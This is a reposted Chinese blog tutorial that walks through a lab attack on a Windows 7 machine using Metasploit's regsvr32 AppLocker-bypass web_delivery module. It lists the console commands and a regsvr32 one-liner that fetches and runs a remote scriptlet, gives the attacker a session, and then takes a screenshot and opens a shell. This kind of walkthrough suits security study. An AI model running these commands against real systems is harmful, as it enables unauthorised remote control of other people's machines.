码迷,mamicode.com
首页 > Web开发 > 详细

msf web_delivery模块攻击

时间:2018-05-03 19:57:52      阅读:610      评论:0      收藏:0      [点我收藏+]

标签:执行   src   set   height   locker   shel   .dll   并且   exp   

目标机:win7                    ip:192.168.31.136

攻击机:kai liunx                      ip:192.168.31.54

一.使用web_delivery模块的regsvr32_applocker_bypass_server

1.打开神器metasploit,终端输入msfconsole

技术分享图片 

2.搜索web_delivery模块,search web_delivery

技术分享图片

3.使用命令use exploit/windows/misc/regsvr32_applocker_bypass_server,并且查看这个模块选项

技术分享图片

技术分享图片

4.设置攻击机ip,set lhost 192.168.31.54

技术分享图片

5.运行,run或者rexpolit

技术分享图片 

6.复制生成的regsvr32 /s /n /u /i:http://192.168.31.54:8080/Yos79zYgod.sct scrobj.dll,拿到目标机win7上去运行.

技术分享图片

7.回到攻击机kai liunx就可以看到已经成功监听,并返回了一个session
技术分享图片

技术分享图片

8.输入sessions,查看session内容

技术分享图片

9.输入命令sessions -i 1,这样就控制到了目标机了

技术分享图片

10.截取当前桌面屏幕,并且去root目录下查看

技术分享图片

技术分享图片

11.输入shell,来到我们熟悉的界面,随便执行一个命令看看

技术分享图片

 

msf web_delivery模块攻击

标签:执行   src   set   height   locker   shel   .dll   并且   exp   

原文地址:https://www.cnblogs.com/haiyan123/p/8986501.html

(1)
(1)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!